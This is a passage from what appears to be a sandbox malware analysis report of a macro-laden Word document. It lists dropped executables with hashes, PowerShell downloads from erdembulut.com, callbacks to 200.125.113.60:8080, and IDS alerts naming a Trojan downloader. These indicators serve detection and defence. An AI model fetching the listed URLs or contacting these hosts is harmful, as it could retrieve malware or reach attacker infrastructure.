MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2680 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:A1B3F099E433A1C80F75E27EFAD5E1D3 | SHA256:15B3A25A3E322D340651CC578797BFD74C4E6137974FE8A65B526EC2195C52A1 | |||
2760 | 784.exe | C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe | executable | |
MD5:E3A822335FF17167EF126A8858F02457 | SHA256:9F3F5857DE6D5E51DDFAD6E1BBD23E885D8B570DCDFBFFD8544C5EB02ACCFDD5 | |||
2680 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:FFDDA778140572C37C6C1B9E1A88C58B | SHA256:478279FBD54E6D1EE6C21D74755708B0B3AD34CCC4069C872C81C9A3A4BF25D2 | |||
3956 | powershell.exe | C:\Users\admin\AppData\Local\Temp\784.exe | executable | |
MD5:E3A822335FF17167EF126A8858F02457 | SHA256:9F3F5857DE6D5E51DDFAD6E1BBD23E885D8B570DCDFBFFD8544C5EB02ACCFDD5 | |||
2680 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$dfasdf.doc.xml | pgc | |
MD5:F28C7546AE14C609B4ABC7A2ABF8123E | SHA256:9DDDC249A3E0C2C90ABE62708D2655FF0FB431775DD4C73268FF99FCA8427547 | |||
3956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF24831b.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3040 | wabmetagen.exe | GET | — | 200.125.113.60:8080 | http://200.125.113.60:8080/ | AR | — | — | malicious |
3956 | powershell.exe | GET | 200 | 94.73.146.97:80 | http://erdembulut.com/trEVDaG/ | TR | executable | 192 Kb | malicious |
3956 | powershell.exe | GET | 301 | 94.73.146.97:80 | http://erdembulut.com/trEVDaG | TR | html | 1.12 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3956 | powershell.exe | 94.73.146.97:80 | erdembulut.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | malicious |
3040 | wabmetagen.exe | 200.125.113.60:8080 | — | Telecentro S.A. | AR | malicious |
Domain | IP | Reputation |
---|---|---|
erdembulut.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3956 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3956 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3956 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3956 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |